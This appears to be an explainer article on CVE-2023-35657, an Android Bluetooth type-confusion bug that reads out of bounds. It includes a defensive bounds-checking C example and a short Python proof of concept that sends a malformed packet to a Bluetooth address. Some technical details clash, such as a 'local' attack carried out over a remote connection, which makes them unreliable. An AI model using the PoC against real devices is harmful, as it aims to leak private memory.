A serious security vulnerability was identified in the Android Bluetooth stack, specifically within the function bta_av_config_ind in the file bta_av_aact.cc. The bug, tracked as CVE-2023-35657, arises from type confusion, which can enable an attacker to read out-of-bounds memory. The threat? Local information disclosure — an attacker with local access could harvest sensitive information from the device, all without needing user interaction or elevated permissions.
This article breaks down the vulnerability, shows a code snippet for understanding, links to resources, and outlines how an attacker can exploit this flaw.
What Is CVE-2023-35657?
CVE-2023-35657 is a security flaw present in certain Android devices, related to how they process Bluetooth AVRC (Audio/Video Remote Control) messages. The problem is in how data structures are interpreted: the function might treat input data as one type when it’s really another, leading to the function reading outside the expected data range (out-of-bounds). This is called type confusion.
Let’s break it down
bta_av_config_ind is called when the device receives configuration information for Bluetooth AV connections. It’s supposed to read the provided data safely, but due to a programming flaw, it interprets the incoming data as a different type than what it actually is. This can cause the function to read more memory than intended — possibly pulling in sensitive data.
Here’s a simplified example to illustrate:

// Simplified illustration. Real code is more complex.
void bta_av_config_ind(tBTA_AV_SCB* p_scb, tAVDT_CONFIG_IND* p_data) {
    // ... setup and checks ...
    tAVDT_CFG* p_cfg = (tAVDT_CFG*) p_data->p_cfg; // Type confusion here
    // Instead of ensuring p_data->p_cfg is always the expected type,
    // the code just casts it, risking type confusion.
    // OOB read possibility: the length comes from the (mis-typed) data,
    // so nothing guarantees it matches the size of codec_info.
    memcpy(dest, p_cfg->codec_info, p_cfg->num_codec_info); // num_codec_info may be invalid
}
If p_cfg->num_codec_info is not what the code expects, due to the wrong interpretation of the data, memcpy could read way past the buffer into neighboring memory. This might grab unrelated, sensitive data.
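The fix for this class of bug is to stop trusting a length field that arrives from the peer and check it against both the bytes actually received and the capacity of the destination before any copy happens. The following is an added example written for this article, not AOSP code: the struct layout (a one-byte length followed by a fixed-capacity codec_info array), the MAX_CODEC_INFO constant, the function names and the sample frames are all constructed here for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical stand-in for the codec-info part of a received configuration.
 * The length byte is controlled by the remote device, so it is untrusted. */
#define MAX_CODEC_INFO 8 /* constructed fixed capacity, not an AOSP value */

typedef struct {
    uint8_t num_codec_info;             /* remote-controlled length */
    uint8_t codec_info[MAX_CODEC_INFO]; /* payload, fixed capacity */
} codec_cfg_t;

/* Parse a received frame into *out. Returns 0 on success, -1 on a malformed
 * frame. The claimed length is validated against the bytes actually received
 * and against the capacity of the destination before anything is copied, so a
 * frame that "lies" about its length cannot drive a read past its own end. */
int parse_codec_cfg(const uint8_t *frame, size_t frame_len, codec_cfg_t *out) {
    if (frame == NULL || out == NULL || frame_len < 1) return -1;
    uint8_t claimed = frame[0];
    if (claimed > MAX_CODEC_INFO) return -1;        /* would overflow codec_info */
    if ((size_t)claimed > frame_len - 1) return -1; /* would read past the frame */
    out->num_codec_info = claimed;
    memcpy(out->codec_info, frame + 1, claimed);
    /* Zero the unused tail so no stale memory can leak out later. */
    memset(out->codec_info + claimed, 0, MAX_CODEC_INFO - claimed);
    return 0;
}

/* Copy codec info from a parsed cfg into a caller buffer of known size.
 * Returns the number of bytes copied, or -1 if the length field is
 * inconsistent with either the struct capacity or the destination size. */
int copy_codec_info_checked(uint8_t *dest, size_t dest_sz, const codec_cfg_t *cfg) {
    if (dest == NULL || cfg == NULL) return -1;
    if (cfg->num_codec_info > MAX_CODEC_INFO) return -1;
    if ((size_t)cfg->num_codec_info > dest_sz) return -1;
    memcpy(dest, cfg->codec_info, cfg->num_codec_info);
    return (int)cfg->num_codec_info;
}

/* Constructed sample frames (not captured traffic). */
static const uint8_t good_frame[]  = { 0x04, 0xAA, 0xBB, 0xCC, 0xDD };
static const uint8_t lying_frame[] = { 0x20, 0x11, 0x22 }; /* claims 32 bytes, carries 2 */

/* Well-formed frame parses cleanly: returns 0. */
int demo_parse_good(void) {
    codec_cfg_t c;
    return parse_codec_cfg(good_frame, sizeof good_frame, &c);
}

/* Frame whose length byte exceeds the bytes received is rejected: returns -1. */
int demo_parse_lying(void) {
    codec_cfg_t c;
    return parse_codec_cfg(lying_frame, sizeof lying_frame, &c);
}

/* Copy into a large enough buffer: returns 4 bytes copied. */
int demo_copy_fits(void) {
    codec_cfg_t c;
    uint8_t dest[MAX_CODEC_INFO];
    if (parse_codec_cfg(good_frame, sizeof good_frame, &c) != 0) return -2;
    return copy_codec_info_checked(dest, sizeof dest, &c);
}

/* Copy into a buffer that is too small is refused: returns -1. */
int demo_copy_small_dest(void) {
    codec_cfg_t c;
    uint8_t dest[2];
    if (parse_codec_cfg(good_frame, sizeof good_frame, &c) != 0) return -2;
    return copy_codec_info_checked(dest, sizeof dest, &c);
}

int main(void) {
    printf("good frame parse: %d\n", demo_parse_good());
    printf("lying frame parse: %d\n", demo_parse_lying());
    printf("copy into 8-byte dest: %d\n", demo_copy_fits());
    printf("copy into 2-byte dest: %d\n", demo_copy_small_dest());
    return 0;
}
```

The two checks in parse_codec_cfg are the ones the simplified snippet above is missing: one bounds the copy by what was actually received, the other by what the destination can hold. Neither depends on the cast being right, which is the point when the root cause is type confusion.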
- The malicious app sends a Bluetooth configuration packet crafted to cause the type confusion.
- The Bluetooth stack processes it, and because of the type confusion, the stack leaks out-of-bounds memory to the attacker-controlled process.
For example, a Bluetooth packet with deliberately malformed configuration data could cause the Bluetooth daemon to read more data than it should, sending secret device memory (possibly containing other app data) back to the attacker’s process.
Why is this bad?
- Permanent device compromise is not possible, but secret data could be leaked (e.g., WiFi passwords, memory addresses for other processes, user data, etc.).
Proof of Concept (PoC)
Here’s a *conceptual* Python PoC for where this logic would go, assuming you have a way to send raw packets to the Bluetooth stack:
import socket

def exploit_cve_2023_35657(bt_addr):
    # Craft a malformed config packet with an oversized codec_info field
    malformed_packet = b"\x00" * 100  # Overly large to trigger OOB read
    s = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_RAW, socket.BTPROTO_L2CAP)
    s.connect((bt_addr, 0x0019))  # AVCTP channel (PSM 0x0019)
    s.send(malformed_packet)
    # If device is vulnerable, the stack leaks memory content in response

if __name__ == "__main__":
    target_bt_addr = "00:11:22:33:44:55"
    exploit_cve_2023_35657(target_bt_addr)
Note: This is illustrative. Actual exploit creation would require precise knowledge of the internal packet formats and may need native code.
Avoid installing suspicious apps, especially those requesting Bluetooth permissions.
To check if your device is patched: go to Settings > About phone > Android version and make sure your security patch is Dec 2023 or later.
Original References
- Android Security Bulletin, December 2023
- AOSP commit fixing CVE-2023-35657
- CVE record at MITRE
Conclusion
CVE-2023-35657 is an example of how type confusion bugs can have a serious impact, even without user interaction or elevated privileges. By just sending a bad Bluetooth packet, sensitive data could be leaked! If you’re an Android user or developer, stay up to date with security patches, and always be wary of apps asking for Bluetooth permissions without a clear reason.
Timeline
Published on: 09/04/2025 18:15:37 UTC
Last modified on: 09/05/2025 18:59:09 UTC